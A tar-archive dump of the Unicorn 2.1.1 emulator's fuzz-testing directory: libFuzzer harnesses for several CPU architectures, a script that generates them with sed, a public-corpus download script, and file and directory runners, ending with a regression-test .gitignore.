������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/���������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015344�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/Makefile�������������������������������������������������������������������0000664�0000000�0000000�00000000576�14675241067�0017014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������CFLAGS += -L ../../ -I ../../include UNAME_S := $(shell uname -s) LDFLAGS += -pthread ifeq ($(UNAME_S), Linux) LDFLAGS += -lrt endif LDFLAGS += ../../libunicorn.a ALL_TESTS_SOURCES = $(wildcard fuzz*.c) ALL_TESTS = $(ALL_TESTS_SOURCES:%.c=%) .PHONY: all all: ${ALL_TESTS} .PHONY: clean clean: rm -rf ${ALL_TESTS} fuzz%: fuzz%.c $(CC) $(CFLAGS) $^ onedir.c $(LDFLAGS) -o $@ ����������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/dlcorpus.sh����������������������������������������������������������������0000664�0000000�0000000�00000000562�14675241067�0017536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#/bin/sh #change to script directory cd `dirname $0` ls fuzz_emu*.c | sed 's/.c//' | while read target do #download public corpus wget "https://storage.googleapis.com/unicorn-backup.clusterfuzz-external.appspot.com/corpus/libFuzzer/unicorn_$target/public.zip" unzip -q public.zip -d corpus_$target #run target on corpus ./$target corpus_$target done ����������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu.options�����������������������������������������������������������0000664�0000000�0000000�00000000033�14675241067�0020621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[libfuzzer] max_len = 4096 
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm64_arm.c�������������������������������������������������������0000664�0000000�0000000�00000002672�14675241067�0021233�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ����������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm64_armbe.c�����������������������������������������������������0000664�0000000�0000000�00000002717�14675241067�0021542�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 
* 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm_arm.c���������������������������������������������������������0000664�0000000�0000000�00000002670�14675241067�0021057�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm_armbe.c�������������������������������������������������������0000664�0000000�0000000�00000002715�14675241067�0021366�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation 
uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ���������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm_thumb.c�������������������������������������������������������0000664�0000000�0000000�00000002672�14675241067�0021421�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ����������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_m68k_be.c���������������������������������������������������������0000664�0000000�0000000�00000002700�14675241067�0020666�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB 
memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ����������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_mips_32be.c�������������������������������������������������������0000664�0000000�0000000�00000002721�14675241067�0021221�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �����������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_mips_32le.c�������������������������������������������������������0000664�0000000�0000000�00000002724�14675241067�0021236�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() 
with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ��������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_s390x_be.c��������������������������������������������������������0000664�0000000�0000000�00000002701�14675241067�0020770�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_S390X, UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ���������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_sparc_32be.c������������������������������������������������������0000664�0000000�0000000�00000002721�14675241067�0021361�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN, &uc); if (err != 
UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �����������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_x86_16.c����������������������������������������������������������0000664�0000000�0000000�00000002667�14675241067�0020402�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_X86, UC_MODE_16, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_x86_32.c����������������������������������������������������������0000664�0000000�0000000�00000002667�14675241067�0020400�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); 
if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_x86_64.c����������������������������������������������������������0000664�0000000�0000000�00000002667�14675241067�0020405�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/gentargets.sh��������������������������������������������������������������0000664�0000000�0000000�00000003313�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#/bin/sh # generates all fuzz targets for different architectures from the template in fuzz_emu_x86_32.c sed 's/UC_MODE_32/UC_MODE_64/' fuzz_emu_x86_32.c > fuzz_emu_x86_64.c sed 's/UC_MODE_32/UC_MODE_16/' fuzz_emu_x86_32.c > fuzz_emu_x86_16.c sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_32be.c #sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_64be.c sed 
's/UC_ARCH_X86/UC_ARCH_M68K/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_BIG_ENDIAN/' > fuzz_emu_m68k_be.c sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN/' > fuzz_emu_mips_32le.c sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN/' > fuzz_emu_mips_32be.c sed 's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm64_arm.c sed 's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm64_armbe.c sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm_arm.c sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB/' > fuzz_emu_arm_thumb.c sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_armbe.c #sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_thumbbe.c sed 's/UC_ARCH_X86/UC_ARCH_S390X/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_BIG_ENDIAN/' > fuzz_emu_s390x_be.c���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/onedir.c�������������������������������������������������������������������0000664�0000000�0000000�00000003317�14675241067�0016774�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdint.h> #include <stdlib.h> #include <stdio.h> #include <dirent.h> #include <unistd.h> int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); int main(int argc, char** argv) { FILE * fp; uint8_t Data[0x1000]; size_t Size; DIR *d; struct dirent *dir; int r = 0; if (argc != 2) { return 1; } d = opendir(argv[1]); if (d == NULL) { printf("Invalid directory\n"); return 2; } if (chdir(argv[1]) != 0) { closedir(d); printf("Invalid directory\n"); return 2; } printf("Starting directory %s\n", argv[1]); while((dir = readdir(d)) != NULL) { //opens the file, get its size, and reads it into a buffer if (dir->d_type != DT_REG) { continue; } //printf("Running file %s\n", dir->d_name); fflush(stdout); fp = fopen(dir->d_name, "rb"); if (fp == NULL) { r = 3; break; } if (fseek(fp, 0L, SEEK_END) != 0) { fclose(fp); r = 4; break; } Size = ftell(fp); if (Size == (size_t) -1) { fclose(fp); r = 5; break; } else if (Size > 0x1000) { fclose(fp); continue; } if (fseek(fp, 0L, SEEK_SET) != 0) { fclose(fp); r = 7; break; } if (fread(Data, Size, 1, fp) != 1) { fclose(fp); r = 8; break; } //lauch fuzzer LLVMFuzzerTestOneInput(Data, Size); fclose(fp); } closedir(d); printf("Ok : whole directory finished %s\n", argv[1]); return r; } 
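The thirteen fuzz_emu_*.c harnesses above are instances of one template; gentargets.sh regenerates them from fuzz_emu_x86_32.c by swapping the uc_open() architecture/mode pair. Each one maps 4MB at 0x1000000, copies the input in, and emulates at most 0x1000 instructions so looping inputs cannot hang the fuzzer, and each exports only LLVMFuzzerTestOneInput(). onedir.c supplies the main() that replays every file in a corpus directory (the Makefile links it into each target), and the onefile.c driver that follows replays a single input file. For a quick check with no corpus on disk at all, a throwaway driver along these lines would also work (hypothetical, not part of the tree; the bytes are an arbitrary x86 example, so pair it with one of the x86 harnesses):

/* Hypothetical smoke test: feed one hard-coded input to a harness. */
#include <stdint.h>
#include <stddef.h>

int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size);

int main(void)
{
    static const uint8_t input[] = { 0x40, 0x40, 0xc3 }; /* inc eax; inc eax; ret */
    return LLVMFuzzerTestOneInput(input, sizeof(input));
}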
unicorn-2.1.1/tests/fuzz/onefile.c000066400000000000000000000016421467524106700171340ustar00rootroot00000000000000
#include <stdint.h> #include <stdlib.h> #include <stdio.h> int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); int main(int argc, char** argv) { FILE * fp; uint8_t *Data; size_t Size; if (argc != 2) { return 1; } //open the file, get its size, and read it into a buffer fp = fopen(argv[1], "rb"); if (fp == NULL) { return 2; } if (fseek(fp, 0L, SEEK_END) != 0) { fclose(fp); return 2; } Size = ftell(fp); if (Size == (size_t) -1) { fclose(fp); return 2; } if (fseek(fp, 0L, SEEK_SET) != 0) { fclose(fp); return 2; } Data = malloc(Size); if (Data == NULL) { fclose(fp); return 2; } if (fread(Data, Size, 1, fp) != 1) { free(Data); fclose(fp); return 2; } //launch fuzzer LLVMFuzzerTestOneInput(Data, Size); free(Data); fclose(fp); return 0; }
unicorn-2.1.1/tests/regress/000077500000000000000000000000001467524106700160205ustar00rootroot00000000000000
unicorn-2.1.1/tests/regress/.gitignore000066400000000000000000000014301467524106700200060ustar00rootroot00000000000000
!*.c arm_enable_vfp map_crash sigill sigill2 block_test map_write ro_mem_test nr_mem_test timeout_segfault rep_movsb mips_kseg0_1 eflags_nosync 00opcode_uc_crash eflags_noset invalid_read_in_cpu_tb_exec invalid_write_in_cpu_tb_exec_x86_64 x86_16_segfault mips_invalid_read_of_size_4_when_tracing invalid_read_in_tb_flush_x86_64 sparc_jump_to_zero mips_delay_slot_code_hook threaded_emu_start emu_stop_in_hook_overrun mips_branch_likely_issue emu_clear_errors 001-bad_condition_code_0xe 002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0 003-qemu__fatal__wdebug_not_implemented 004-segmentation_fault_1 005-qemu__fatal__illegal_instruction__0000___00000404 006-qemu__fatal__illegal_instruction__0421___00040026 rw_hookstack hook_extrainvoke sysenter_hook_x86 memleak_* mem_*
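A possible tidy-up for onefile.c above: it repeats the teardown sequence on every error path, which is easy to let drift as the driver grows. The same logic with a single exit label, sketched under the assumption that behavior should not change:

/* Sketch: onefile.c's main() with one exit path (illustrative only). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size);

int main(int argc, char **argv)
{
    uint8_t *Data = NULL;
    size_t Size;
    int rc = 2;
    FILE *fp;

    if (argc != 2)
        return 1;
    fp = fopen(argv[1], "rb");
    if (fp == NULL)
        return 2;
    /* resolve the input size, then rewind */
    if (fseek(fp, 0L, SEEK_END) != 0 || (Size = ftell(fp)) == (size_t)-1 ||
        fseek(fp, 0L, SEEK_SET) != 0)
        goto out;
    Data = malloc(Size);
    if (Data == NULL || fread(Data, Size, 1, fp) != 1)
        goto out;
    LLVMFuzzerTestOneInput(Data, Size);
    rc = 0;
out:
    free(Data);
    fclose(fp);
    return rc;
}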
